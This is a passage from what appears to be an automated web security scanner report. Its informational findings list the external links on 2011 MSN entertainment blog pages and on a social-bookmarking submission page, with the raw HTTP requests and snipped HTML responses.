</i> title -- this is what you really want, right? <a href="http://www.theshiznit.co.uk/feature/if-the-best-picture-nominee-posters-told-the-truth.php?sms_ss=facebook&at_xt=4d411feb6c635f02%2C0" title="http://www.theshiznit.co.uk/feature/if-the-best-picture-nominee-posters-told-the-truth.php?sms_ss=facebook&at_xt=4d411feb6c635f02%2C0">The Shiznit</a>
...[SNIP]...
<br />The <a href="http://www.theshiznit.co.uk/feature/if-the-best-picture-nominee-posters-told-the-truth.php?sms_ss=facebook&at_xt=4d411feb6c635f02%2C0" title="http://www.theshiznit.co.uk/feature/if-the-best-picture-nominee-posters-told-the-truth.php?sms_ss=facebook&at_xt=4d411feb6c635f02%2C0">Shiznit</a>
...[SNIP]...
<div class="pst_exc more"><img alt="" class="imagefloatleft userImage lead" src="http://media.social.s-msn.com/images/blogs/00290065-0000-0000-0000-000000000000_00000065-06d3-0000-0000-000000000000_20110202024744_Jack-Nicholson.jpg" />How can you not love Jack Nicholson after this interview?<br />
...[SNIP]...
<br />Read the whole thing, but here's one choice bit, from <a href="http://www.dailymail.co.uk/home/moslive/article-1350653/Jack-Nicholson-I-used-feel-irresistible-women-Not-more.html" title="http://www.dailymail.co.uk/home/moslive/article-1350653/Jack-Nicholson-I-used-feel-irresistible-women-Not-more.html">The Daily Mail</a>
...[SNIP]...
<div class="pst_exc more"><img src="http://media.social.s-msn.com/images/blogs/00290065-0000-0000-0000-000000000000_00000065-06d3-0000-0000-000000000000_20110202023627_336965619.jpg" alt="" class="imagefloatcenter userImage lead" />Today is the legend's birthday. And this picture, well, a picture can tell a thousand words. Or one ... <br />
...[SNIP]...
<div class="pst_exc more"><img alt="" class="imagefloatcenter userImage lead" src="http://media.social.s-msn.com/images/blogs/00290065-0000-0000-0000-000000000000_00000065-06d3-0000-0000-000000000000_20110202023351_gambit_firth_diaz.jpg" />A re-make of "Gambit"?<br />
...[SNIP]...
<br />Here's more about the project and cast from <a href="http://blogs.indiewire.com/thompsononhollywood/2011/02/01/diaz_firth_team_for_coen_scripted_gambit/#" title="http://blogs.indiewire.com/thompsononhollywood/2011/02/01/diaz_firth_team_for_coen_scripted_gambit/#">Thompson on Hollywood</a>
...[SNIP]...
<div class="pst_exc more"><img alt="" class="imagefloatcenter userImage lead" src="http://media.social.s-msn.com/images/blogs/00290065-0000-0000-0000-000000000000_00000065-06d3-0000-0000-000000000000_20110201210500_wicked-witch.jpg" />Cracked runs an interesting <a href="http://www.cracked.com/article_18417_the-lighter-side-dark-side-5-villains-who-were-good.html" title="http://www.cracked.com/article_18417_the-lighter-side-dark-side-5-villains-who-were-good.html">gallery</a>
...[SNIP]...
<br />Cracked <a href="http://www.cracked.com/article_18417_the-lighter-side-dark-side-5-villains-who-were-good.html" title="http://www.cracked.com/article_18417_the-lighter-side-dark-side-5-villains-who-were-good.html">writes</a>
...[SNIP]...
<div class="pst_exc more"><img alt="" class="imagefloatright userImage lead" src="http://media.social.s-msn.com/images/blogs/00290065-0000-0000-0000-000000000000_00000065-06d3-0000-0000-000000000000_20110201164929_CoreyHaim_150.jpg" />I find this explanation to be strangely, even more insulting, and an admission of a bad practice. <br />
...[SNIP]...
<p>"Friend and former co-star <a href="http://www.bing.com/search?q=Corey+Feldman&form=msnena" title="http://www.bing.com/search?q=Corey+Feldman&form=msnena">Corey Feldman</a>
...[SNIP]...
<div class="pst_exc more"><img alt="" class="imagefloatcenter userImage lead" src="http://media.social.s-msn.com/images/blogs/00290065-0000-0000-0000-000000000000_00000065-06d3-0000-0000-000000000000_20110131201721_the_fighter_movie_image_melissa_leo-600x399.jpg" />Sheila O'Malley, who authors the terrific blog <a href="http://www.sheilaomalley.com/" title="http://www.sheilaomalley.com/">The Sheila Variations</a>, has written a wonderful piece at <a href="http://www.fandor.com/blog/?p=2552" title="http://www.fandor.com/blog/?p=2552">Fandor</a>
...[SNIP]...
<p><img alt="" class="imagefloatcenter userImage lead" src="http://media.social.s-msn.com/images/blogs/00290065-0000-0000-0000-000000000000_00000065-06d3-0000-0000-000000000000_20110131182509_TheRitePoster2-560x827.jpg" />Though many insiders claim it's the power of Anthony Hopkins that drew audiences to his newest picture, "The Rite" over the weekend, I say ... sort of.</p>
...[SNIP]...
<p>Here's more from <a href="http://www.thewrap.com/movies/article/box-office-hopkins-rite-light-16m-still-no-1-24328" title="http://www.thewrap.com/movies/article/box-office-hopkins-rite-light-16m-still-no-1-24328">TheWrap</a>
...[SNIP]...
<div class="pst_exc more"><img alt="" class="imagefloatcenter userImage lead" src="http://media.social.s-msn.com/images/blogs/00290065-0000-0000-0000-000000000000_00000065-06d3-0000-0000-000000000000_20110131181225_Robert-Redford.jpg" />Here's a nice video wrap-up of the Sundance Film Festival brought to you by the <a href="http://www.sundance.org/videos/bcpid111173691001/?bckey=AQ%7E%7E,AAAAAFwqu74%7E,9_JrqmLhkoysgRMS2GGtZIqbsmNNeu6j&bclid=490887639001&bctid=770444292001" title="http://www.sundance.org/videos/bcpid111173691001/?bckey=AQ%7E%7E,AAAAAFwqu74%7E,9_JrqmLhkoysgRMS2GGtZIqbsmNNeu6j&bclid=490887639001&bctid=770444292001">festival</a>
...[SNIP]...
<p><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.sunsetgun.com">Kim Morgan</a>
...[SNIP]...
<li class="first"><a href="http://www.slashfilm.com">/film</a></li><li><a href="http://blog.brightlightsfilm.com/">Bright Lights After Dark</a>
...[SNIP]...
<li><a href="http://chud.com/articles/">Chud</a></li><li><a href="http://www.cinematical.com">Cinematical</a>
...[SNIP]...
<li><a href="http://filmexperience.blogspot.com/">The Film Experience</a>
...[SNIP]...
<li><a href="http://finalgirl.blogspot.com">Final Girl</a></li><li><a href="http://daily.greencine.com">Green Cine</a></li><li><a href="http://www.hitfix.com">HitFix</a></li><li><a href="http://www.riskybusinessblog.com">Hollywood Reporter Risky Business Blog</a>
...[SNIP]...
<li><a href="http://thehousenextdooronline.com">The House Next Door</a>
...[SNIP]...
<li><a href="http://sunsetgun.typepad.com/sunsetgun/">Kim Morgan's Sunset Gun</a>
...[SNIP]...
<li><a href="http://www.moviecitynews.com/">Movie City News</a>
...[SNIP]...
<li><a href="http://www.avclub.com">Onion AV Club</a>
...[SNIP]...
<li><a href="http://theplaylist.blogspot.com">The Playlist</a>
...[SNIP]...
<li><a href="http://blogs.suntimes.com/scanners/">Scanners</a></li><li><a href="http://selfstyledsiren.blogspot.com">Self Styled Siren</a>
...[SNIP]...
<li><a href="http://sergioleoneifr.blogspot.com">Sergio Leone and Infield Fly Rule</a>
...[SNIP]...
<li><a href="http://www.sheilaomalle.com">The Sheila Variations</a>
...[SNIP]...
<li><a href="http://www.vanityfair.com/online/wolcott">Vanity Fair's James Wolcott</a>
...[SNIP]...
<li class="last"><a href="http://www.thewrap.com">The Wrap</a>
...[SNIP]...
<li class="last"><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

17.176. http://social.entertainment.msn.com/tv/blogs/reality-tv-blog.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://social.entertainment.msn.com
Path:	/tv/blogs/reality-tv-blog.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://social.entertainment.msn.com/tv/blogs/reality-tv-blog.aspx?blog=2080&feat=c25e3cc1-6967-469c-b0f3-a1868c50d9f5&gt1=28159

The response contains the following links to other domains:

http://advertising.microsoft.com/msn/
http://amazingrace.wetpaint.com/
http://americanidol.wetpaint.com/
http://cbsncis.wetpaint.com/
http://csi.wetpaint.com/
http://download.live.com/?sku=messenger
http://images.buddytv.com/articles/Adriennefarm.jpg
http://images.buddytv.com/articles/AllenLewis.jpg
http://images.buddytv.com/articles/CivilWarrealness.jpg
http://images.buddytv.com/articles/Dangerfield1.jpg
http://images.buddytv.com/articles/EmmaH2.jpg
http://images.buddytv.com/articles/HaleyReinhart.jpg
http://images.buddytv.com/articles/Idolabduction.jpg
http://images.buddytv.com/articles/JLoearthmotherhiphop.jpg
http://images.buddytv.com/articles/Judgeoutfits.jpg
http://images.buddytv.com/articles/Naima3.jpg
http://images.buddytv.com/articles/Younique.jpg
http://images.buddytv.com/articles/comeonmattdillard.jpg
http://images.buddytv.com/articles/cryingcowboy.jpg
http://images.buddytv.com/articles/pleasedontfallinloveagain.jpg
http://images.buddytv.com/articles/pleasefallinloveagain2.jpg
http://images.buddytv.com/articles/radiovoice.jpg
http://img.widgets.video.s-msn.com/flash/customplayer/1_0/customplayer.swf
http://img.widgets.video.s-msn.com/flash/gallerywidget/1_0/gallerywidget.swf
http://insidemsn.wordpress.com/
http://mail.live.com/
http://media.social.s-msn.com/images/blogs/00250065-0000-0000-0000-000000000000_00000065-0820-0000-0000-000000000000_20110125181552_jamie.jpg
http://media.social.s-msn.com/images/blogs/00250065-0000-0000-0000-000000000000_00000065-0820-0000-0000-000000000000_20110125195505_jersey-shore-season-3.jpg
http://media.social.s-msn.com/images/blogs/00250065-0000-0000-0000-000000000000_00000065-0820-0000-0000-000000000000_20110125203318_bach.jpg
http://media.social.s-msn.com/images/blogs/00250065-0000-0000-0000-000000000000_00000065-0820-0000-0000-000000000000_20110127181952_bacheloremilynascar.jpg
http://media.social.s-msn.com/images/blogs/00250065-0000-0000-0000-000000000000_00000065-0820-0000-0000-000000000000_20110128145521_idolmilwaukee_blog.jpg
http://media.social.s-msn.com/images/blogs/00250065-0000-0000-0000-000000000000_00000065-0820-0000-0000-000000000000_20110131161805_nashville_blog.jpg
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportalent.112.2o7.net/b/ss/msnportalent/1/H.1--NS/0
http://search.bing.com/results.aspx
http://search.bing.com/results.aspx?FORM=entertainment
http://thebachelor.warnerbros.com/
http://twitter.com/
http://twitter.com/pattistanger
http://twitter.com/pattistanger/status/21732029448060928
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search?q=american+idol&go=&form=msnena
http://www.bing.com/search?q=brad+womack&form=MSNENA
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse/tv/show?tag=the+bachelor&go=&form=msnena
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.buddytv.com/
http://www.buddytv.com/american-idol.aspx
http://www.buddytv.com/articles/american-idol/american-idol-audition-bingo-39120.aspx
http://www.delish.com/
http://www.dwts.org/
http://www.hulu.com/msn/http:/www.bing.com/videos/watch/video/a-really-unusual-situation/17wb238no/embed/z9RQnUi4LeVYawTy82TCgQ
http://www.hulu.com/msn/http:/www.bing.com/videos/watch/video/emotional-race/17w5pcxcn/embed/kVWNCO0sjcrmhiZcXtAk3g
http://www.hulu.com/msn/http:/www.bing.com/videos/watch/video/full-frontal/17w0r6t3f/embed/m8JBhJgP8y2hNnZzQ__Dfw
http://www.madmenshow.com/
http://www.thegreysanatomywiki.com/
http://www.thementalisttvshow.com/
http://www.tvguide.com/News/Bachelor-Brad-Emily-1028059.aspx
http://www.tvguide.com/News/Bachelor-Interview-Chris-1028283.aspx
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296661285&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fsocial.entertainment.msn.com%2Ftv%2Fblogs%2Freality-tv-blog.aspx%3Fblog%3D2080%26feat%3Dc25e3cc1-6967-469c-b0f3-a1868c50d9f5%26gt1%3D28159&lc=1033&id=250710
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /tv/blogs/reality-tv-blog.aspx?blog=2080&feat=c25e3cc1-6967-469c-b0f3-a1868c50d9f5&gt1=28159 HTTP/1.1
Host: social.entertainment.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:41:25 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA52
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=f8101b99e44644c4af7a8fab12fb723d; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=A70CF1A39B7A41C5A3009F89A0BA3F57; domain=.entertainment.msn.com; expires=Sun, 21-Aug-2011 15:41:25 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 83753

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...
<div><img src="http://msnportalent.112.2O7.net/b/ss/msnportalent/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://search.bing.com/results.aspx?FORM=entertainment">Bing</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296661285&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fsocial.entertainment.msn.com%2Ftv%2Fblogs%2Freality-tv-blog.aspx%3Fblog%3D2080%26feat%3Dc25e3cc1-6967-469c-b0f3-a1868c50d9f5%26gt1%3D28159&lc=1033&id=250710" class="dMSNME_1">Sign in</a>
...[SNIP]...
<div><a id="wslink" href="http://search.bing.com/results.aspx">Search the web</a>
...[SNIP]...
<div class="embed-box"><object id="CustomPlayer1_IE" type="application/x-shockwave-flash" width="596" height="425" data="http://img.widgets.video.s-msn.com/flash/customplayer/1_0/customplayer.swf"><param name="movie" value="http://img.widgets.video.s-msn.com/flash/customplayer/1_0/customplayer.swf" />
...[SNIP]...
</b> <a href="http://www.bing.com/videos/browse/tv/show?tag=the+bachelor&go=&form=msnena" title="http://www.bing.com/videos/browse/tv/show?tag=the+bachelor&go=&form=msnena">See clips and full episodes</a>
...[SNIP]...
<div class="embed-box"><object id="Gallery1_IE" type="application/x-shockwave-flash" width="500" height="155" data="http://img.widgets.video.s-msn.com/flash/gallerywidget/1_0/gallerywidget.swf"><param name="movie" value="http://img.widgets.video.s-msn.com/flash/gallerywidget/1_0/gallerywidget.swf" />
...[SNIP]...
<div class="embed-box"><object type="application/x-shockwave-flash" width="512" height="288" data="http://www.hulu.com/msn/http%3A%2F%2Fwww.bing.com%2Fvideos%2Fwatch%2Fvideo%2Ffull-frontal%2F17w0r6t3f/embed/m8JBhJgP8y2hNnZzQ__Dfw"><param name="movie" value="http://www.hulu.com/msn/http%3A%2F%2Fwww.bing.com%2Fvideos%2Fwatch%2Fvideo%2Ffull-frontal%2F17w0r6t3f/embed/m8JBhJgP8y2hNnZzQ__Dfw" />
...[SNIP]...
<i><img src="http://media.social.s-msn.com/images/blogs/00250065-0000-0000-0000-000000000000_00000065-0820-0000-0000-000000000000_20110131161805_nashville_blog.jpg" alt="'American Idol'/FOX" class="imagefloatcenter userImage lead" />By Carla Patton</i>
...[SNIP]...
<p><a href="http://www.buddytv.com/" title="http://www.buddytv.com/"><i>
...[SNIP]...
</b> <a href="http://www.bing.com/search?q=american+idol&go=&form=msnena" title="http://www.bing.com/search?q=american+idol&go=&form=msnena">More "American Idol" photos and video</a>
...[SNIP]...
</b> <a href="http://www.buddytv.com/american-idol.aspx" title="http://www.buddytv.com/american-idol.aspx">"American Idol" on BuddyTV</a> | <a href="http://www.buddytv.com/articles/american-idol/american-idol-audition-bingo-39120.aspx" title="http://www.buddytv.com/articles/american-idol/american-idol-audition-bingo-39120.aspx">Play "American Idol" Audition BINGO</a>
...[SNIP]...
<p><img src="http://images.buddytv.com/articles/pleasefallinloveagain2.jpg" alt="pleasefallinloveagain2.jpg" class="mt-image-center lead" /></p>
...[SNIP]...
<p><img src="http://images.buddytv.com/articles/pleasedontfallinloveagain.jpg" alt="pleasedontfallinloveagain.jpg" class="mt-image-center lead" /></p>
...[SNIP]...
<p><img src="http://images.buddytv.com/articles/Adriennefarm.jpg" alt="Adriennefarm.jpg" class="mt-image-center lead" /></p>
...[SNIP]...
<p><img src="http://images.buddytv.com/articles/JLoearthmotherhiphop.jpg" alt="JLoearthmotherhiphop.jpg" class="mt-image-center lead" /></p>
...[SNIP]...
<p><img src="http://images.buddytv.com/articles/comeonmattdillard.jpg" alt="comeonmattdillard.jpg" class="mt-image-center lead" /><br />
...[SNIP]...
<p><img src="http://images.buddytv.com/articles/AllenLewis.jpg" alt="AllenLewis.jpg" class="mt-image-center lead" /></p>
...[SNIP]...
<div><img src="http://images.buddytv.com/articles/cryingcowboy.jpg" alt="cryingcowboy.jpg" class="mt-image-center lead" /></div>
...[SNIP]...
<div><img src="http://images.buddytv.com/articles/Younique.jpg" alt="Younique.jpg" class="mt-image-center lead" /></div>
...[SNIP]...
<div class="embed-box"><object id="Gallery1_IE" type="application/x-shockwave-flash" width="500" height="155" data="http://img.widgets.video.s-msn.com/flash/gallerywidget/1_0/gallerywidget.swf"><param name="movie" value="http://img.widgets.video.s-msn.com/flash/gallerywidget/1_0/gallerywidget.swf" />
...[SNIP]...
<div class="pst_exc more"><img src="http://media.social.s-msn.com/images/blogs/00250065-0000-0000-0000-000000000000_00000065-0820-0000-0000-000000000000_20110127181952_bacheloremilynascar.jpg" alt="Courtesy of ABC via www.tvguide.com" class="imagefloatcenter userImage lead" />The date hasn't even aired yet, and it's already stirred up fury among some ABC "Bachelor" loyalists. Emily Maynard, the beautiful blond vying for the affections of Bachelor Brad Womack is essentially
...[SNIP]...
y, who tells him, "You think you’ve left it behind and you come here." Brad: "I feel like a jerk." Some viewers also were unhappy about the upcoming date. A poll on the Warner Brothers' Bachelor <a href="http://thebachelor.warnerbros.com/" title="http://thebachelor.warnerbros.com/">website</a> asked viewers what they thought, and 77 percent so far have voted for "It's cruel and completely inappropriate." Host Chris Harrison did not improve the situation when he <a href="http://www.tvguide.com/News/Bachelor-Interview-Chris-1028283.aspx" title="http://www.tvguide.com/News/Bachelor-Interview-Chris-1028283.aspx">told tvguide.com</a>
...[SNIP]...
<br />We already decided we want Emily to be the next Bachelorette, and former Bachelor Jason Mesnick <a href="http://twitter.com/#%21/jason_mesnick/status/27471381344030720" title="http://twitter.com/#%21/jason_mesnick/status/27471381344030720">concurs</a>
...[SNIP]...
<br /><a href="http://www.tvguide.com/News/Bachelor-Brad-Emily-1028059.aspx" title="http://www.tvguide.com/News/Bachelor-Brad-Emily-1028059.aspx"><i><div class="embed-box"><object type="application/x-shockwave-flash" width="512" height="288" data="http://www.hulu.com/msn/http%3A%2F%2Fwww.bing.com%2Fvideos%2Fwatch%2Fvideo%2Femotional-race%2F17w5pcxcn/embed/kVWNCO0sjcrmhiZcXtAk3g"><param name="movie" value="http://www.hulu.com/msn/http%3A%2F%2Fwww.bing.com%2Fvideos%2Fwatch%2Fvideo%2Femotional-race%2F17w5pcxcn/embed/kVWNCO0sjcrmhiZcXtAk3g" />
...[SNIP]...
<i><img src="http://media.social.s-msn.com/images/blogs/00250065-0000-0000-0000-000000000000_00000065-0820-0000-0000-000000000000_20110128145521_idolmilwaukee_blog.jpg" alt="'American Idol'/FOX" class="imagefloatcenter userImage lead" />By Carla Patton</i>
...[SNIP]...
<p><a href="http://www.buddytv.com/" title="http://www.buddytv.com/"><i>
...[SNIP]...
</b> <a href="http://www.bing.com/search?q=american+idol&go=&form=msnena" title="http://www.bing.com/search?q=american+idol&go=&form=msnena">More "American Idol" photos and video</a>
...[SNIP]...
</b> <a href="http://www.buddytv.com/american-idol.aspx" title="http://www.buddytv.com/american-idol.aspx">"American Idol" on BuddyTV</a> | <a href="http://www.buddytv.com/articles/american-idol/american-idol-audition-bingo-39120.aspx" title="http://www.buddytv.com/articles/american-idol/american-idol-audition-bingo-39120.aspx">Play "American Idol" Audition BINGO</a>
...[SNIP]...
<div><img src="http://images.buddytv.com/articles/Idolabduction.jpg" alt="Idolabduction.jpg" class="mt-image-center lead" /></div>
...[SNIP]...
<p><img src="http://images.buddytv.com/articles/Naima3.jpg" alt="Naima3.jpg" class="mt-image-center lead" /><br />
...[SNIP]...
<p><img src="http://images.buddytv.com/articles/HaleyReinhart.jpg" alt="HaleyReinhart.jpg" class="mt-image-center lead" /></p>
...[SNIP]...
<p><img src="http://images.buddytv.com/articles/Dangerfield1.jpg" alt="Dangerfield1.jpg" class="mt-image-center lead" /><br />
...[SNIP]...
<p><img src="http://images.buddytv.com/articles/EmmaH2.jpg" alt="EmmaH2.jpg" class="mt-image-center lead" /><br />
...[SNIP]...
<p> <img src="http://images.buddytv.com/articles/Judgeoutfits.jpg" alt="Judgeoutfits.jpg" class="mt-image-center" /><br />
...[SNIP]...
<p><img src="http://images.buddytv.com/articles/radiovoice.jpg" alt="radiovoice.jpg" class="mt-image-center lead" /><br />
...[SNIP]...
<p><img src="http://images.buddytv.com/articles/CivilWarrealness.jpg" alt="CivilWarrealness.jpg" class="mt-image-center lead" /><br />
...[SNIP]...
<div class="embed-box"><object id="Gallery1_IE" type="application/x-shockwave-flash" width="500" height="155" data="http://img.widgets.video.s-msn.com/flash/gallerywidget/1_0/gallerywidget.swf"><param name="movie" value="http://img.widgets.video.s-msn.com/flash/gallerywidget/1_0/gallerywidget.swf" />
...[SNIP]...
<div class="embed-box"><object type="application/x-shockwave-flash" width="512" height="288" data="http://www.hulu.com/msn/http%3A%2F%2Fwww.bing.com%2Fvideos%2Fwatch%2Fvideo%2Fa-really-unusual-situation%2F17wb238no/embed/z9RQnUi4LeVYawTy82TCgQ"><param name="movie" value="http://www.hulu.com/msn/http%3A%2F%2Fwww.bing.com%2Fvideos%2Fwatch%2Fvideo%2Fa-really-unusual-situation%2F17wb238no/embed/z9RQnUi4LeVYawTy82TCgQ" />
...[SNIP]...
<p>But there is a way to get your Patti fix beyond Bravo re-runs. Fortunately for us all, she has a <a href="http://twitter.com/pattistanger" title="http://twitter.com/pattistanger">Twitter feed</a>
...[SNIP]...
<p>Patti is an avid tweeter (check out an <a href="http://twitter.com/pattistanger/status/21732029448060928" title="http://twitter.com/pattistanger/status/21732029448060928">exchange</a>
...[SNIP]...
<p><img src="http://media.social.s-msn.com/images/blogs/00250065-0000-0000-0000-000000000000_00000065-0820-0000-0000-000000000000_20110125203318_bach.jpg" alt="" class="imagefloatcenter userImage lead" />I love this time of year on "The Bachelor" because the crazies are still around. Witness: Michelle, and her black eye. Munchausen syndrome, what? As far as "Bachelor" strategies go, it's an innovative
...[SNIP]...
</b> <a href="http://www.bing.com/search?q=brad+womack&form=MSNENA" title="http://www.bing.com/search?q=brad+womack&form=MSNENA">Brad Womack</a>
...[SNIP]...
<div><img src="http://media.social.s-msn.com/images/blogs/00250065-0000-0000-0000-000000000000_00000065-0820-0000-0000-000000000000_20110125195505_jersey-shore-season-3.jpg" alt="Photo courtesy MTV" class="imagefloatcenter userImage lead" />Forget the Jersey Shore. Forget Miami. Now your favorite fist-pumping, over-gelled, over-sexed uber-Italians are headed across the pond -- to the motherland.</div>
...[SNIP]...
<p><img src="http://media.social.s-msn.com/images/blogs/00250065-0000-0000-0000-000000000000_00000065-0820-0000-0000-000000000000_20110125181552_jamie.jpg" alt="" class="imagefloatcenter userImage lead" /><br />
...[SNIP]...
<li class="first"><a href="http://amazingrace.wetpaint.com/">The Amazing Race</a>
...[SNIP]...
<li><a href="http://americanidol.wetpaint.com">American Idol</a>
...[SNIP]...
<li><a href="http://csi.wetpaint.com">CSI: Crime Scene Investigation</a>
...[SNIP]...
<li><a href="http://www.dwts.org/">Dancing With The Stars</a>
...[SNIP]...
<li><a href="http://www.thegreysanatomywiki.com/">Grey's Anatomy</a>
...[SNIP]...
<li><a href="http://www.madmenshow.com/">Mad Men</a></li><li><a href="http://www.thementalisttvshow.com/">The Mentalist</a>
...[SNIP]...
<li class="last"><a href="http://cbsncis.wetpaint.com">NCIS</a>
...[SNIP]...
<li class="last"><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

17.177. http://sociallist.org/submit.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sociallist.org
Path:	/submit.php

Issue detail

The page was loaded from a URL containing a query string:

http://sociallist.org/submit.php?type=1&lang=en&url=refpage&title=refpage&tag=refpage&text=refpage

The response contains the following links to other domains:

http://bookmarks.yahoo.com/toolbar/savebm?opener=tb&u=&t=
http://buddymarks.com/add_bookmark.php?bookmark_url=&bookmark_title=
http://cgi.fark.com/cgi/fark/submit.pl
http://del.icio.us/post/?url=&title=&notes=&tags=
http://digg.com/submit?phase=2&url=&title=&bodytext=&topic=
http://faves.com/Authoring.aspx?u=&t=&noteText=&tagsText=
http://favorites.my.aol.com/ffclient/AddBookmark?url=&title=&favelet=true
http://jumptags.com/
http://ktulhu.net/
http://linuxdev1.tlt.psu.edu/pligg/submit.php?url=
http://mac.itemname.com/
http://multiply.com/gus/journal/compose/addthis?body=&url=&subject=
http://myjeeves.ask.com/mysearch/BookmarkIt?v=1.2&t=webpages&url=&title=&abstext=&tagField=
http://myweb2.search.yahoo.com/myresults/bookmarklet?u=title=
http://postonfire.com/submit.php?url=
http://reddit.com/submit?url=&title=
http://relatelist.com/
http://slashdot.org/slashdot-it.pl?op=basic&url=
http://sphinn.com/submit.php?url=
http://technorati.com/faves/?add=
http://twitter.com/home?status=%20
http://www.bestbuygame.com/
http://www.bibsonomy.org/ShowBookmarkEntry?c=b&jump=yes&url=&description=&extended=&tags=
http://www.bizsugar.com/submit.php?url=
http://www.blinklist.com/?Action=Blink/addblink.php&Description=&Url=&Title=&Tag=
http://www.blogengage.com/submit.php?url=
http://www.blurpalicious.com/submit.php?url=
http://www.connotea.org/addpopup?continue=confirm&uri=&title=&description=&tags=
http://www.corank.com/submit?url=&title=&source=w
http://www.dealigg.com/submit.php?url=
http://www.designfloat.com/submit.php?url=
http://www.diigo.com/post?b_mode=0&c_mode=0&url=&title=&comments=&tag=
http://www.dropjack.com/submit.php?url=
http://www.dzone.com/links/add.html?url=&title=&description=
http://www.egolddomain.com/
http://www.facebook.com/sharer.php?u=&t=
http://www.folkd.com/submit/
http://www.freedownloadutilities.com/
http://www.freshgameplay.com/
http://www.gaamle.com/
http://www.google.com/bookmarks/mark?op=add&bkmk=&title=&labels=&annotation=&cd=bm&btnA=Add
http://www.indianpad.com/submit.php?url=
http://www.itemname.com/
http://www.killerstartups.com/register/submit.php?url=
http://www.kirtsy.com/submit.php?url=
http://www.linkagogo.com/go/AddNoPopup?url=&title=&comments=&keywords=
http://www.mister-wong.com/addurl/?bm_url=&bm_description=
http://www.mixx.com/submit?page_url=
http://www.mylinkvault.com/link-page.php?u=&n=
http://www.myspace.com/Modules/PostTo/Pages/?c=&t=
http://www.newsvine.com/_tools/seed&save?u=&h=&blurb=&tags=
http://www.pligg.com/submit.php?url=
http://www.propeller.com/submit?storyUrl=&storyTitle=&storyText=&storyTags=
http://www.realfreedownload.com/
http://www.spurl.net/spurl.php?url=&title=&keywords=&description=
http://www.squidoo.com/lensmaster/bookmark?
